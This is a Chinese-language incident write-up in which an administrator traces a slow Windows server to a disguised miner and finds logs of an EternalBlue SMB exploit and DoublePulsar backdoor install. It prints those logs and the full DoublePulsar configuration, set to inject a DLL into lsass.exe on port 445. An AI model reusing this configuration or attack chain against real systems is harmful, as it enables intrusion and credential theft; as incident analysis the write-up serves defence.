近期用户反馈某台服务器总感觉性能不是很好存在卡顿,于是今天远程上去分析。
打开任务管理器发现CPU使用率非常低,内存使用也在接受范围内(10/64G)。不过我有一个偏好就是不喜欢用系统自带的任务管理器查看资源,顺手把procexp搞上去再看一遍。发现rundll32.exe显示占用了62%左右的CPU资源,加载执行一个名为HalPluginServices.dll。之前看过《深入解析Windows操作系统》,就对前缀Hal(Hardware Abstraction Layer)有个概念。和它并行在svhost.exe下运行的还有spoolsv.exe,第一眼看都是挺系统级的执行文件。移动鼠标到spoolsv.exe查看它的运行路径,显示:C:WindowsSpeechsTracingspoolsv.exe。看到Speech前缀我心想是不是微软的讲述人相关功能,碰巧打开目录下面还有一个Microsoft子目录,这时候差点信以为真。但我注意到spoolsv.exe会执行cmd,好奇查看了一下是什么命令:
C:WindowsSpeechsTracingMicrosoftsvhost.exe > stage1.txt
出于好奇心紧接着打开stage1.txt,看到如下内容:
[*] Connecting to target for exploitation. [+] Connection established for exploitation. [*] Pinging backdoor... [+] Backdoor not installed, game on. [*] Target OS selected valid for OS indicated by SMB reply [*] CORE raw buffer dump (54 bytes): 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2 0x00000010 30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73 008 R2 Enterpris 0x00000020 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50 e 7601 Service P 0x00000030 61 63 6b 20 31 00 ack 1. [*] Building exploit buffer [*] Sending all but last fragment of exploit packet ................DONE. [*] Sending SMB Echo request [*] Good reply from SMB Echo request [*] Starting non-paged pool grooming [+] Sending SMBv2 buffers ..........DONE. [+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] Sending SMB Echo request [*] Good reply from SMB Echo request [*] Sending last fragment of exploit packet! DONE. [*] Receiving response from exploit packet
这不正是一个SMB攻击,再看一下同目录下的stage2.txt:
[+] Selected Protocol SMB [.] Connecting to target... [+] Connected to target, pinging backdoor... [+] Backdoor returned code: 10 - Success! [+] Ping returned Target architecture: x64 (64-bit) - XOR Key: 0xEE83B3A2 SMB Connection string is: Windows Server 2008 R2 Enterprise 7601 Service Pack 1 Target OS is: 2008 R2 x64 Target SP is: 1 [+] Backdoor installed [+] DLL built [.] Sending shellcode to inject DLL [+] Backdoor returned code: 10 - Success! [+] Backdoor returned code: 10 - Success! [+] Backdoor returned code: 10 - Success! [+] Backdoor returned code: 10 - Success! [+] Backdoor returned code: 10 - Success! [+] Backdoor returned code: 10 - Success! [+] Backdoor returned code: 10 - Success! [+] Backdoor returned code: 10 - Success! [+] Backdoor returned code: 10 - Success! [+] Backdoor returned code: 10 - Success! [+] Backdoor returned code: 10 - Success! [+] Backdoor returned code: 10 - Success! [+] Backdoor returned code: 10 - Success! [+] Backdoor returned code: 10 - Success! [+] Backdoor returned code: 10 - Success! [+] Backdoor returned code: 10 - Success! [+] Backdoor returned code: 10 - Success! [+] Backdoor returned code: 10 - Success! [+] Backdoor returned code: 10 - Success! [+] Backdoor returned code: 10 - Success! [+] Backdoor returned code: 10 - Success! [+] Backdoor returned code: 10 - Success! [+] Backdoor returned code: 10 - Success! [+] Backdoor returned code: 10 - Success! [+] Backdoor returned code: 10 - Success! [+] Backdoor returned code: 10 - Success! [+] Backdoor returned code: 10 - Success! [+] Backdoor returned code: 10 - Success! [+] Backdoor returned code: 10 - Success! [+] Backdoor returned code: 10 - Success! [+] Backdoor returned code: 10 - Success! [+] Backdoor returned code: 10 - Success! [+] Backdoor returned code: 10 - Success! [+] Backdoor returned code: 10 - Success! [+] Backdoor returned code: 10 - Success! [+] Backdoor returned code: 10 - Success! [+] Backdoor returned code: 10 - Success! [+] Backdoor returned code: 10 - Success! [+] Backdoor returned code: 10 - Success! [+] Backdoor returned code: 10 - Success! [+] Backdoor returned code: 10 - Success! [+] Backdoor returned code: 10 - Success! [+] Command completed successfully <config xmlns="urn:trch" id="a748cf79831d6c2444050f18217611549fe3f619" configversion="1.3.1.0" name="Doublepulsar" version="1.3.1" schemaversion="2.0.0"> <inputparameters> <parameter name="NetworkTimeout" description="Timeout for blocking network calls (in seconds). Use -1 for no timeout." type="S16" format="Scalar" valid="true"> <default>60</default> <value>60</value> </parameter> <parameter name="TargetIp" description="Target IP Address" type="IPv4" format="Scalar" valid="true"> <value>10.244.251.57</value> </parameter> <parameter name="TargetPort" description="Port used by the Double Pulsar back door" type="TcpPort" format="Scalar" valid="true"> <default>445</default> <value>445</value> </parameter> <parameter name="LogFile" description="Where to write log file" type="String" format="Scalar" required="false"></parameter> <parameter name="OutConfig" description="Where to write output parameters file" type="String" format="Scalar" valid="true"> <default>stdout</default> <value>stdout</value> </parameter> <parameter name="ValidateOnly" description="Stop execution after parameter validation" type="Boolean" format="Scalar" valid="true"> <default>false</default> <value>false</value> </parameter> <paramchoice name="Protocol" description="Protocol for the backdoor to speak"> <default>SMB</default> <value>SMB</value> <paramgroup name="SMB" description="Ring 0 SMB (TCP 445) backdoor"></paramgroup> <paramgroup name="RDP" description="Ring 0 RDP (TCP 3389) backdoor"></paramgroup> </paramchoice> <paramchoice name="Architecture" description="Architecture of the target OS"> <default>x64</default> <value>x64</value> <paramgroup name="x86" description="x86 32-bits"></paramgroup> <paramgroup name="x64" description="x64 64-bits"></paramgroup> </paramchoice> <paramchoice name="Function" description="Operation for backdoor to perform"> <default>OutputInstall</default> <value>RunDLL</value> <paramgroup name="OutputInstall" description="Only output the install shellcode to a binary file on disk."> <parameter name="OutputFile" description="Full path to the output file" type="String" format="Scalar"></parameter> </paramgroup> <paramgroup name="Ping" description="Test for presence of backdoor"></paramgroup> <paramgroup name="RunDLL" description="Use an APC to inject a DLL into a user mode process."> <parameter name="DllPayload" description="DLL to inject into user mode" type="LocalFile" format="Scalar" valid="true"> <value>C:WindowsSpeechsTracingMicrosoft\x64.dll</value> </parameter> <parameter name="DllOrdinal" description="The exported ordinal number of the DLL being injected to call" type="U32" format="Scalar" valid="true"> <default>0</default> <value>1</value> </parameter> <parameter name="ProcessName" description="Name of process to inject into" type="String" format="Scalar" valid="true"> <default>lsass.exe</default> <value>lsass.exe</value> </parameter> <parameter name="ProcessCommandLine" description="Command line of process to inject into" type="String" format="Scalar" valid="true"> <default></default> <value></value> </parameter> </paramgroup> <paramgroup name="RunShellcode" description="Run raw shellcode"> <parameter name="ShellcodeFile" description="Full path to the file containing shellcode" type="LocalFile" format="Scalar"></parameter> <parameter name="ShellcodeData" description="Full path to the file containing shellcode to run" type="LocalFile" format="Scalar"></parameter> </paramgroup> <paramgroup name="Uninstall" description="Remove's backdoor from system"></paramgroup> </paramchoice> </inputparameters> <outputparameters> <paramchoice name="Function" description="Operation for backdoor to perform"> <paramgroup name="OutputInstall" description="Only output the install shellcode to a file on disk."> <parameter name="ShellcodeFile" description="Full path to the file containing Double Pulsar shellcode installer" type="String" format="Scalar"></parameter> <parameter name="ShellcodeData" description="Full path to the file containing Double Pulsar shellcode installer" type="LocalFile" format="Scalar"></parameter> </paramgroup> <paramgroup name="Ping" description="Test for presence of backdoor"> <parameter name="Is64Bit" description="Is target 64 or 32 bit" type="U32" format="Scalar"></parameter> </paramgroup> <paramgroup name="RunDLL" description="Inject a DLL into a user mode process."> <parameter name="Is64Bit" description="Is target 64 or 32 bit" type="U32" format="Scalar"></parameter> </paramgroup> <paramgroup name="Uninstall" description="Remove's backdoor from system"> <parameter name="Is64Bit" description="Is target 64 or 32 bit" type="U32" format="Scalar"></parameter> </paramgroup> </paramchoice> </outputparameters> </config>
基本明白这是一个蠕虫病毒,目录下面还有之前的永恒之蓝(Eternalblue-2.2.0.fb)。这个时候我突然意识到一个现象,原来病毒作者发现用户运行任务管理器时候会自动把rundll32.exe给杀掉,造成一个系统运行占用CPU资源很少的假象,我只是运行了procexp才发现了问题。